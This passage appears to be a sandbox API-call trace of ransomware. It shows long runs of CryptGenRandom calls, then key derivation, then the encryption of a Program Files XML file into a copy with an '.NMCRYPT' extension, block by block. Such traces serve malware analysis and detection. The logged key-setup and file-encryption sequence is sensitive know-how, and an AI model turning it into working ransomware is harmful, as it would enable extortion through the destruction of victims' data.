pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.549] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.550] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.551] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptGenRandom (in: hProv=0x8bf310, dwLen=0x4, pbBuffer=0x2d7e630 | out: pbBuffer=0x2d7e630) returned 1 [0143.552] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0xf4, dwBufLen=0xaa0 | out: pbData=0x28d3e40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.552] CryptEncrypt (in: hKey=0x8c6ba8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x1c, dwBufLen=0x9a0 | out: pbData=0x28d3f40*, pdwDataLen=0x2d7e64c*=0x100) returned 1 [0143.552] CryptCreateHash (in: hProv=0x8e3110, Algid=0x800e, hKey=0x0, dwFlags=0x0, phHash=0x60d1b4 | out: phHash=0x60d1b4) returned 1 [0143.552] CryptHashData (hHash=0x8bdbf8, pbData=0x2d7e6d0, dwDataLen=0x100, dwFlags=0x0) returned 1 [0143.552] CryptDeriveKey (in: hProv=0x8e3110, Algid=0x6610, hBaseData=0x8bdbf8, dwFlags=0x4, phKey=0x60d1b8 | out: phKey=0x60d1b8*=0x8bdc78) returned 1 [0143.552] CryptSetKeyParam (hKey=0x8bdc78, dwParam=0x1, pbData=0x2d7e7d0, dwFlags=0x0) returned 1 [0143.552] CryptSetKeyParam (hKey=0x8bdc78, dwParam=0x4, pbData=0x2d7e680*=0x1, dwFlags=0x0) returned 1 [0143.552] wcslen (_String="\\\\?\\") returned 0x4 [0143.553] CryptDuplicateKey (in: hKey=0x8bdc78, pdwReserved=0x0, dwFlags=0x0, phKey=0x2d7e654 | out: phKey=0x2d7e654*=0x8bdd38) returned 1 [0143.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml.NMCRYPT" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml.nmcrypt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x588 [0143.553] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\microsoft shared\\ink\\Alphabet.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\alphabet.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0143.567] GetFileSizeEx (in: hFile=0x780, lpFileSize=0x2d7e644 | out: lpFileSize=0x2d7e644*=791421) returned 1 [0143.567] WriteFile (in: hFile=0x588, lpBuffer=0x28d3e40*, nNumberOfBytesToWrite=0x200, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d3e40*, lpNumberOfBytesWritten=0x2d7e63c*=0x200, lpOverlapped=0x0) returned 1 [0143.568] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.570] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.570] GetLastError () returned 0x0 [0143.570] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.571] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.571] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.571] GetLastError () returned 0x0 [0143.571] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.571] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.571] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.571] GetLastError () returned 0x0 [0143.571] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x2d7e63c, lpOverlapped=0x0 | out: lpBuffer=0x28d48e8*, lpNumberOfBytesWritten=0x2d7e63c*=0x100, lpOverlapped=0x0) returned 1 [0143.572] ReadFile (in: hFile=0x780, lpBuffer=0x28d3d38, nNumberOfBytesToRead=0x100, lpNumberOfBytesRead=0x2d7e640, lpOverlapped=0x0 | out: lpBuffer=0x28d3d38*, lpNumberOfBytesRead=0x2d7e640*=0x100, lpOverlapped=0x0) returned 1 [0143.572] CryptEncrypt (in: hKey=0x8bdd38, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100, dwBufLen=0xa00 | out: pbData=0x28d48e8*, pdwDataLen=0x2d7e628*=0x100) returned 1 [0143.572] GetLastError () returned 0x0 [0143.572] WriteFile (in: hFile=0x588, lpBuffer=0x28d48e8*, 